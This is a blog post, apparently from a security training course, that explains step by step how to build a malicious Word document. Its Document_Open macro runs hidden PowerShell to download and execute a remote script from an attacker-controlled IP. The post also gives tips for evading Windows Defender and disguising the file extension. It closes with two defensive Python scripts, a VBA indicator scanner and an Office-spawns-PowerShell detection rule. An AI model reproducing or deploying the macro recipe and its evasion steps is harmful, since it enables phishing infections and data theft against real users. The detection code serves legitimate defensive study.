Malicious attack with Macro code

Salim Salimov
Aug 6, 2023


In this post I am going to share one of the first things I learned in my cyber security training course:

I can bet that all of you, including myself, have received suspicious emails with attachments from unknown senders, or from senders pretending to be your bank, your workplace or some other organisation you deal with. They can be very creative and can design these emails and attached documents to look like any legitimate email you deal with every day. Their aim is to get you to open one such document, infect your PC with malware, and steal your sensitive information.

As I mentioned at the end of my previous blog post, this one is about how an attacker can create and send a malicious document to a target. Here I will step into the attacker's shoes and attack my own VM, created for testing purposes.

Let's see how a malicious Microsoft Office document can be created to send to a victim.

1. Create a new Word document, or use any template, and open it.

2. Click View and then Macros.

3. Type in a name and press Create.

4. Without editing anything here, navigate in the left-hand panel to Project > Microsoft Word Objects > ThisDocument and double-click it.

5. In the two dropdowns choose Document and Open respectively, as shown on the screenshot. Two entries are generated automatically; delete the first one, as we only need the one that says Document_Open. This means the code we are going to write will be executed every time this document is opened.

6. Now, between the two automatically generated lines, we can type this code:

Shell "powershell.exe -WindowStyle Hidden -c iex ((New-Object Net.WebClient).DownloadString('http://192.168.1.116:4444/malware.ps1'))"

What this code is made of is a few commands put together:

Shell — VBA command that executes a program, here PowerShell

powershell.exe — the PowerShell executable

-WindowStyle Hidden — PowerShell switch that runs PowerShell with a hidden window

-c iex — -c (Command) runs the command that follows; iex (Invoke-Expression) executes the downloaded script text

(New-Object Net.WebClient) — creates a WebClient object that connects to the provided IP or domain address

.DownloadString — downloads the malware script file as a string

('http://192.168.1.116:4444/malware.ps1') — the path to the file that needs to be downloaded and executed; in this demo it is my physical computer's IP

7. The code is done, and we can close the code window.

8. Before closing the document, save it as a macro-enabled document (a .docm file). In my screenshots you can see .dotm, because I chose the document template format when saving rather than the regular document format, but it works the same for this demo. The last letter 'm' in the extension can also be removed so the document looks less suspicious, and it will still work just fine.

Also, Windows Defender needs to be turned off before saving the file; otherwise it will be detected as malicious and deleted. What I do instead is save it to a folder that I have previously added as an exclusion in the Windows Defender settings on my Windows 10.
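The reason Defender deletes the file is that the macro above carries the classic indicators a static macro scanner looks for: an auto-executing entry point (Document_Open), a Shell call, a hidden PowerShell window and a download cradle. The following Python script is an added example written for this post, not the author's code and not any vendor's detection engine. It scans VBA source text, such as what the oletools utility olevba extracts from a .docm, for those indicators, gives a score and pulls out the URL as a network indicator of compromise. The rule names, weights and threshold are arbitrary values chosen for the example.

```python
import re

# Constructed sample: the macro source shown in the post above, as the text
# a tool such as olevba would extract from the .docm file.
SAMPLE_VBA = """
Private Sub Document_Open()
Shell "powershell.exe -WindowStyle Hidden -c iex ((New-Object Net.WebClient).DownloadString('http://192.168.1.116:4444/malware.ps1'))"
End Sub
"""

# Constructed sample: a harmless formatting macro, to show the scanner stays quiet.
BENIGN_VBA = """
Sub BoldSelection()
    Selection.Font.Bold = True
End Sub
"""

# Indicator rules: (name, pattern, weight). The weights are arbitrary values
# chosen for this example, not a published scoring scheme.
RULES = [
    ("autoexec",          re.compile(r'\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|Document_Close|AutoClose)\b', re.I), 2),
    ("shell_exec",        re.compile(r'\b(Shell|CreateObject\s*\(\s*"WScript\.Shell"\s*\))', re.I), 2),
    ("powershell",        re.compile(r'\bpowershell(\.exe)?\b', re.I), 1),
    ("hidden_window",     re.compile(r'-W(?:indowStyle)?\s+Hidden', re.I), 2),
    ("download_cradle",   re.compile(r'(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest)', re.I), 3),
    ("invoke_expression", re.compile(r'\b(iex|Invoke-Expression)\b', re.I), 2),
]
URL_RE = re.compile(r"""https?://[^\s'")]+""", re.I)
SUSPICIOUS_THRESHOLD = 5   # arbitrary cut-off for this example


def scan_vba(source):
    """Return the indicator hits, a score, a verdict and candidate URLs for one VBA module."""
    hits = []
    score = 0
    for name, pattern, weight in RULES:
        match = pattern.search(source)
        if match:
            hits.append((name, match.group(0)))
            score += weight
    return {
        "hits": hits,
        "score": score,
        "suspicious": score >= SUSPICIOUS_THRESHOLD,
        "urls": URL_RE.findall(source),   # network IoCs to block or hunt for
    }


def report(label, source):
    """Print a short human-readable summary of one scan."""
    result = scan_vba(source)
    verdict = "SUSPICIOUS" if result["suspicious"] else "clean"
    print(f"{label}: {verdict} (score {result['score']})")
    for name, evidence in result["hits"]:
        print(f"  {name:18} {evidence}")
    for url in result["urls"]:
        print(f"  url                {url}")


if __name__ == "__main__":
    report("macro from the post", SAMPLE_VBA)
    report("benign macro", BENIGN_VBA)
```

In practice the source text would come from olevba rather than from a string literal, and the rule list would be tuned against the organisation's own legitimate macros, since Shell and AutoOpen do appear in some business templates; the combination with a hidden-window download cradle is what makes this one unambiguous.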

9. Let's test the macro-enabled document, which I created in my Windows 10 VM, by transferring the file to my Windows 7 VM, where Windows Defender is permanently disabled. To see whether it works, I open my Linux terminal and run netcat to listen for requests with this command: nc -lvt 4444. The IP address and port in the malicious code point at my main machine, so the macro will try to download the malicious script from there.

As you can see in the yellow bar, Microsoft Office warns you that this file contains macro code and offers a button to enable the content.

10. When we enable the macro, our netcat tool detects the request made by the malicious code, proving that the code connected back to the attacker and tried to download the malicious file.
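What the netcat listener shows from the attacker's side, a defender sees from the endpoint's side as a process chain: WINWORD.EXE spawning powershell.exe with a hidden window and a download cradle on the command line. The script below is an added example, not part of the original post. It runs that detection over three constructed process-creation records in the shape of Sysmon Event ID 1 forwarded as JSON lines; the paths and timestamps are made up, and the first command line is the one from the macro above. Two of the three records are benign (Word launching the print helper, and an administrator's scheduled script) to show that only the Office-to-script-host chain fires.

```python
import json
import re

# Parents and children that make up the "Office spawns a script host" chain.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments typical of a download-and-execute one-liner.
CMDLINE_INDICATORS = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\biex\b|"
    r"-W(?:indowStyle)?\s+Hidden|FromBase64String)", re.I)

# Constructed sample: three process-creation records in the shape of Sysmon
# Event ID 1 exported as JSON lines. Paths and times are made up for this example.
SAMPLE_LOG = "\n".join(json.dumps(ev) for ev in [
    {"UtcTime": "2023-08-06 10:12:01",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -c iex ((New-Object Net.WebClient)"
                    ".DownloadString('http://192.168.1.116:4444/malware.ps1'))"},
    {"UtcTime": "2023-08-06 10:12:05",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"UtcTime": "2023-08-06 10:13:00",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\cleanup.ps1"},
])


def basename(path):
    """Lower-cased file name of a Windows path (handles either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the reasons one event is suspicious; an empty list means nothing matched."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    reasons = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"office_spawns_script_host:{parent}->{image}")
    for match in CMDLINE_INDICATORS.finditer(event.get("CommandLine", "")):
        reasons.append("cmdline_indicator:" + match.group(0))
    return reasons


def detect(log_text):
    """Scan JSON-lines process events and alert when an Office app spawns a script host.

    Command-line indicators on their own do not alert here (an admin's download
    script under explorer.exe is out of scope); they raise the severity of an
    alert that the parent/child chain already triggered.
    """
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = classify(event)
        chain = [r for r in reasons if r.startswith("office_spawns")]
        indicators = [r for r in reasons if r.startswith("cmdline_indicator")]
        if not chain:
            continue
        alerts.append({
            "time": event.get("UtcTime"),
            "severity": "high" if indicators else "medium",
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert["time"], alert["severity"].upper())
        for reason in alert["reasons"]:
            print("   ", reason)
```

This is the same logic as the widely used "Office application spawns PowerShell" style of EDR rule: the parent/child relationship is the reliable signal, because it does not depend on the exact download command, while the command-line indicators add confidence and give the analyst the URL to chase. Legitimate add-ins that launch script hosts from Office would need an allow-list before deploying such a rule broadly.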

So we all have to be careful with these emails and not get tricked by this kind of attachment. I hope you enjoyed this article as well; thanks for reading.
